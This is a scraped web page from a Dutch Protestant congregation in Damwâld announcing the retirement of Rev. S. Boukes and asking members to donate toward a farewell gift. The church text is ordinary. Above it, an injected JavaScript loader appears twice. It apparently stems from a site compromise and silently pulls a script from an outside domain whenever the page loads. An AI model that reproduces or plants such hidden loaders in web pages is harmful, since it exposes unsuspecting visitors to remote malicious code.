;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid ds. S. Boukes - PKN Damwâld

Afscheid ds. S. Boukes

Gepubliceerd op: dinsdag 6 april 2021

Eind mei gaat ds. Boukes met emeritaat. Maar een dominee die 28 jaar in onze gemeente lief en leed heeft gedeeld en in mei ook nog zijn 40-jarig ambtsjubileum hoopt te vieren laat je natuurlijk niet zo maar gaan. Daarom zijn we bezig met een heel speciaal cadeau; hoe en wat dat blijft nog even geheim, wel is het een cadeau dat mee is ingegeven door de huidige beperkingen van corona.
We twijfelen er niet aan of de meeste gemeenteleden hebben ds. Boukes als meelevende pastor en dominee zeer gewaardeerd.

Welnu dat kunt u onder meer laten blijken door een gift over te maken op bankrekening NL79RABO0343 3062 71 o.v.v.” Cadeau Ds. Boukes”. We danken u bij voorbaat voor uw bijdrage.
Hoe het afscheid wordt georganiseerd is dus sterk afhankelijk van de mogelijkheden op dat moment. U wordt daarover zo vroegtijdig mogelijk en zo volledig mogelijk geïnformeerd.

Commissie afscheid Ds. Boukes